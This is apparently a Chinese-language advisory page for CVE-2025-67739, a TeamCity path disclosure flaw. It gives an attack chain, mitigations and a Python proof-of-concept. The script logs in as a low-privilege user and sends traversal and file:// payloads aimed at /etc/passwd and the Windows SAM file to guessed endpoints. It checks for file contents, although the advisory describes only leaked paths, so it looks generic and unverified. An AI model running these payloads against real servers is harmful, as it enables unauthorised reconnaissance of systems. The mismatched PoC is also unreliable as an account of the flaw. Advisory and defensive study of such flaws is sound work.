CVE-2025-67739: JetBrains TeamCity 路径遍历导致本地路径泄露漏洞

漏洞信息

漏洞编号

CVE-2025-67739

漏洞类型

路径遍历/信息泄露

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

JetBrains TeamCity

漏洞概述

JetBrains TeamCity在2025.11.2之前的版本中存在一个信息泄露漏洞。该漏洞源于仓库URL验证机制不当，攻击者可以通过构造特殊的仓库URL来读取服务器上的本地文件路径。CVSS 3.1评分为3.1，属于低危级别，攻击向量为网络，复杂度高，需要低权限用户参与，但无需用户交互。漏洞主要影响机密性（低影响），完整性和可用性不受影响。攻击者利用此漏洞可以获取服务器的敏感路径信息，可能为后续攻击提供有价值的情报。漏洞已于2025年12月11日披露，建议相关用户及时更新到最新版本以修复此安全问题。

技术细节

该漏洞存在于JetBrains TeamCity的仓库URL处理模块中。系统未能正确验证和清理用户提供的仓库URL输入，导致攻击者可以通过构造包含特殊字符或路径遍历序列的URL来访问服务器本地文件系统。具体来说，当TeamCity处理仓库配置时，如果URL参数中包含类似../的路径遍历序列或file://协议等，服务器可能会返回实际的本地文件路径而非预期的错误信息。攻击者需要具备TeamCity的低权限账户即可发起攻击，成功利用后可获取服务器目录结构、配置文件路径等敏感信息。此类信息泄露虽然不直接导致代码执行，但可能为攻击者提供有价值的目标定位和横向移动线索。

攻击链分析

STEP 1

步骤1

攻击者获取TeamCity低权限账户（普通开发人员或查看者权限）

STEP 2

步骤2

攻击者构造包含路径遍历序列或file://协议的恶意仓库URL

STEP 3

步骤3

通过仓库配置功能提交恶意URL，系统未能正确验证输入

STEP 4

步骤4

TeamCity返回服务器本地文件路径或目录结构信息

STEP 5

步骤5

攻击者收集路径信息，用于后续侦察或针对其他系统的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67739 PoC - JetBrains TeamCity Path Disclosure
# Affected: JetBrains TeamCity < 2025.11.2
# Type: Information Disclosure via Improper URL Validation

import requests
import urllib3
urllib3.disable_warnings()

target = "https://teamcity-server:8111"
username = "low_priv_user"
password = "password123"

# Login to get session
session = requests.Session()
login_url = f"{target}/login.html"
login_data = {
    "username": username,
    "password": password,
    "submitLogin": "Login"
}

response = session.post(login_url, data=login_data, verify=False)
print(f"Login Status: {response.status_code}")

# Try path traversal in repository URL
vulnerable_endpoints = [
    "/repository.html",
    "/admin/repository.html",
    "/app/rest/vcs-root-instances",
    "/app/rest/vcs-roots"
]

payloads = [
    "file:///etc/passwd",
    "file:///../../etc/passwd",
    "http://localhost/../../../etc/passwd",
    "../../../etc/passwd",
    "..\..\..\windows\system32\config\sam"
]

for endpoint in vulnerable_endpoints:
    for payload in payloads:
        try:
            test_url = f"{target}{endpoint}?url={payload}"
            response = session.get(test_url, timeout=10, verify=False)
            if "root:" in response.text or "Administrator" in response.text:
                print(f"[+] VULNERABLE! Endpoint: {endpoint}")
                print(f"[+] Payload: {payload}")
                print(f"[+] Response snippet: {response.text[:500]}")
            elif "path" in response.text.lower() or "c:\windows" in response.text.lower():
                print(f"[*] Possible path disclosure at: {endpoint}")
                print(f"[*] Payload: {payload}")
        except Exception as e:
            print(f"[-] Error testing {endpoint}: {e}")

print("\n[!] Note: This PoC is for educational purposes only.")
print("[!] Always obtain proper authorization before testing.")

影响范围

JetBrains TeamCity < 2025.11.2

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 限制非管理员用户创建或修改仓库配置的权限；2) 在网络层面限制对TeamCity服务器的访问，仅允许受信任的IP地址；3) 启用详细的审计日志并监控可疑的仓库URL请求；4) 考虑使用网络分割将TeamCity部署在隔离的安全区域。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67739
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67739
3 Details https://www.cvedetails.com/cve/CVE-2025-67739/
4 VulDB https://vuldb.com/cve/CVE-2025-67739
5 Link https://www.jetbrains.com/privacy-security/issues-fixed/